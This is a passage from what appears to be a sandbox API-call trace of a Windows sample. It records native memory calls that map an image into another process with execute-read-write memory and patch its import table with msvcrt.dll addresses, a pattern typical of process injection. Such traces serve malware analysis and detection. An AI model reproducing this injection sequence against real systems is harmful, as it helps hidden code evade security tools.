NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x140033000, Buffer=0x640000*, NumberOfBytesToWrite=0xda0, NumberOfBytesWritten=0x28dfd8 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28dfd8*=0xda0) returned 0x0 [0140.263] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28e0f8*=0x640000, RegionSize=0x28e128, FreeType=0x8000) returned 0x0 [0140.263] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x140033000, Buffer=0x94a198*, NumberOfBytesToWrite=0x400, NumberOfBytesWritten=0x28dfd8 | out: Buffer=0x94a198*, NumberOfBytesWritten=0x28dfd8*=0x400) returned 0x0 [0140.263] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28e050*=0x140034000, ZeroBits=0x0, RegionSize=0x28e150*=0x2200, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x28e050*=0x140034000, RegionSize=0x28e150*=0x3000) returned 0x0 [0140.263] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28e088*=0x0, ZeroBits=0x0, RegionSize=0x28e0e8*=0x2200, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28e088*=0x640000, RegionSize=0x28e0e8*=0x3000) returned 0x0 [0140.263] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x140034000, Buffer=0x640000*, NumberOfBytesToWrite=0x2200, NumberOfBytesWritten=0x28dfd8 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28dfd8*=0x2200) returned 0x0 [0140.264] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28e0f8*=0x640000, RegionSize=0x28e128, FreeType=0x8000) returned 0x0 [0140.264] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x140034000, Buffer=0x94a598*, NumberOfBytesToWrite=0x2200, NumberOfBytesWritten=0x28dfd8 | out: Buffer=0x94a598*, NumberOfBytesWritten=0x28dfd8*=0x2200) returned 0x0 [0140.264] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28e050*=0x140037000, ZeroBits=0x0, RegionSize=0x28e150*=0x800, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x28e050*=0x140037000, RegionSize=0x28e150*=0x1000) returned 0x0 [0140.264] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28e088*=0x0, ZeroBits=0x0, RegionSize=0x28e0e8*=0x800, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28e088*=0x640000, RegionSize=0x28e0e8*=0x1000) returned 0x0 [0140.264] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x140037000, Buffer=0x640000*, NumberOfBytesToWrite=0x800, NumberOfBytesWritten=0x28dfd8 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28dfd8*=0x800) returned 0x0 [0140.264] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28e0f8*=0x640000, RegionSize=0x28e128, FreeType=0x8000) returned 0x0 [0140.265] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x140037000, Buffer=0x94c798*, NumberOfBytesToWrite=0x800, NumberOfBytesWritten=0x28dfd8 | out: Buffer=0x94c798*, NumberOfBytesWritten=0x28dfd8*=0x800) returned 0x0 [0140.265] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28e050*=0x140038000, ZeroBits=0x0, RegionSize=0x28e150*=0x600, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x28e050*=0x140038000, RegionSize=0x28e150*=0x1000) returned 0x0 [0140.265] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28e088*=0x0, ZeroBits=0x0, RegionSize=0x28e0e8*=0x600, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28e088*=0x640000, RegionSize=0x28e0e8*=0x1000) returned 0x0 [0140.265] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x140038000, Buffer=0x640000*, NumberOfBytesToWrite=0x600, NumberOfBytesWritten=0x28dfd8 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28dfd8*=0x600) returned 0x0 [0140.265] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28e0f8*=0x640000, RegionSize=0x28e128, FreeType=0x8000) returned 0x0 [0140.265] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x140038000, Buffer=0x94cf98*, NumberOfBytesToWrite=0x600, NumberOfBytesWritten=0x28dfd8 | out: Buffer=0x94cf98*, NumberOfBytesWritten=0x28dfd8*=0x600) returned 0x0 [0140.266] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x9499e8, cbMultiByte=-1, lpWideCharStr=0x28ddb8, cchWideChar=522 | out: lpWideCharStr="msvcrt.dll") returned 11 [0140.266] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28e008*=0x0, ZeroBits=0x0, RegionSize=0x28dd98*=0x2d, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28e008*=0x20000, RegionSize=0x28dd98*=0x1000) returned 0x0 [0140.266] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20010, Buffer=0x28ddb8*, NumberOfBytesToWrite=0x15, NumberOfBytesWritten=0x28e010 | out: Buffer=0x28ddb8*, NumberOfBytesWritten=0x28e010*=0x15) returned 0x0 [0140.266] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28dd70*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28dd90 | out: Buffer=0x28dd70*, NumberOfBytesWritten=0x28dd90*=0x10) returned 0x0 [0140.266] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28dc88, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28dc48 | out: Buffer=0x28dc88*, NumberOfBytesRead=0x28dc48*=0x48) returned 0x0 [0140.266] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28dc38*=0x0, ZeroBits=0x0, RegionSize=0x28dc58*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28dc38*=0x640000, RegionSize=0x28dc58*=0x1000) returned 0x0 [0140.266] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28dc18*=0x0, ZeroBits=0x0, RegionSize=0x28dbc8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28dc18*=0xe0000, RegionSize=0x28dbc8*=0x1000) returned 0x0 [0140.267] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xe0000, Buffer=0x640000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28dc20 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28dc20*=0x30) returned 0x0 [0140.267] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28dc88*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28dc40 | out: Buffer=0x28dc88*, NumberOfBytesWritten=0x28dc40*=0x48) returned 0x0 [0140.267] NtClearEvent (EventHandle=0x144) returned 0x0 [0140.267] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0140.267] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28dc88, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28dc50 | out: Buffer=0x28dc88*, NumberOfBytesRead=0x28dc50*=0x48) returned 0x0 [0140.267] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28dc78*=0xe0000, RegionSize=0x28dc68, FreeType=0x8000) returned 0x0 [0140.267] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28dc70*=0x640000, RegionSize=0x28dc60, FreeType=0x8000) returned 0x0 [0140.267] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20025, Buffer=0x28dd80, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28dd68 | out: Buffer=0x28dd80*, NumberOfBytesRead=0x28dd68*=0x8) returned 0x0 [0140.267] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28dda8*=0x20000, RegionSize=0x28dda0, FreeType=0x8000) returned 0x0 [0140.268] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x2d, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0140.268] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20010, Buffer=0x949a08*, NumberOfBytesToWrite=0x15, NumberOfBytesWritten=0x28df88 | out: Buffer=0x949a08*, NumberOfBytesWritten=0x28df88*=0x15) returned 0x0 [0140.268] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0140.268] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0140.268] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x640000, RegionSize=0x28de48*=0x1000) returned 0x0 [0140.268] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0140.268] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xe0000, Buffer=0x640000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0140.268] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0140.269] NtClearEvent (EventHandle=0x144) returned 0x0 [0140.269] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0140.269] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0140.269] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0140.269] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x640000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0140.269] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20025, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0140.269] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0140.269] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x14002a2e8, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0140.270] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x24, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0140.270] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20010, Buffer=0x949a20*, NumberOfBytesToWrite=0xc, NumberOfBytesWritten=0x28df88 | out: Buffer=0x949a20*, NumberOfBytesWritten=0x28df88*=0xc) returned 0x0 [0140.270] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0140.270] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0140.270] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x640000, RegionSize=0x28de48*=0x1000) returned 0x0 [0140.270] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0140.270] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xe0000, Buffer=0x640000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0140.270] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0140.271] NtClearEvent (EventHandle=0x144) returned 0x0 [0140.271] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0140.271] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0140.271] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0140.271] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x640000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0140.271] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x2001c, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0140.271] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0140.271] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x14002a2f0, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0140.271] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x1e, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0140.272] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20010, Buffer=0x949a2e*, NumberOfBytesToWrite=0x6, NumberOfBytesWritten=0x28df88 | out: Buffer=0x949a2e*, NumberOfBytesWritten=0x28df88*=0x6) returned 0x0 [0140.272] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0140.272] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0140.272] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x640000, RegionSize=0x28de48*=0x1000) returned 0x0 [0140.272] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0140.272] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xe0000, Buffer=0x640000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0140.272] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0140.273] NtClearEvent (EventHandle=0x144) returned 0x0 [0140.273] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0140.273] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0140.273] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0140.273] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x640000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0140.273] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20016, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0140.273] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0140.273] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x14002a2f8, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0140.274] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x1f, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0140.274] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20010, Buffer=0x949a36*, NumberOfBytesToWrite=0x7, NumberOfBytesWritten=0x28df88 | out: Buffer=0x949a36*, NumberOfBytesWritten=0x28df88*=0x7) returned 0x0 [0140.274] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0140.274] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0140.274] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x640000, RegionSize=0x28de48*=0x1000) returned 0x0 [0140.274] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0140.274] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xe0000, Buffer=0x640000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0140.274] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0140.274] NtClearEvent (EventHandle=0x144) returned 0x0 [0140.274] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0140.275] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0140.275] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0140.275] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x640000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0140.275] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20017, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0140.275] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0140.275] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x14002a300, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0140.275] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x1d, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0140.275] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20010, Buffer=0x949a40*, NumberOfBytesToWrite=0x5, NumberOfBytesWritten=0x28df88 | out: Buffer=0x949a40*, NumberOfBytesWritten=0x28df88*=0x5) returned 0x0 [0140.276] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0140.276] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0140.276] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x640000, RegionSize=0x28de48*=0x1000) returned 0x0 [0140.276] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0140.276] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xe0000, Buffer=0x640000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0140.276] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0140.276] NtClearEvent (EventHandle=0x144) returned 0x0 [0140.276] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0140.276] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0140.277] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0140.277] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x640000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0140.277] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20015, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0140.277] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0140.277] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x14002a308, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0140.277] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x20, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0140.277] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20010, Buffer=0x949a48*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28df88 | out: Buffer=0x949a48*, NumberOfBytesWritten=0x28df88*=0x8) returned 0x0 [0140.277] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0140.277] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0140.277] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x640000, RegionSize=0x28de48*=0x1000) returned 0x0 [0140.278] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0140.278] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xe0000, Buffer=0x640000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0140.278] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0140.278] NtClearEvent (EventHandle=0x144) returned 0x0 [0140.278] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0140.278] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, 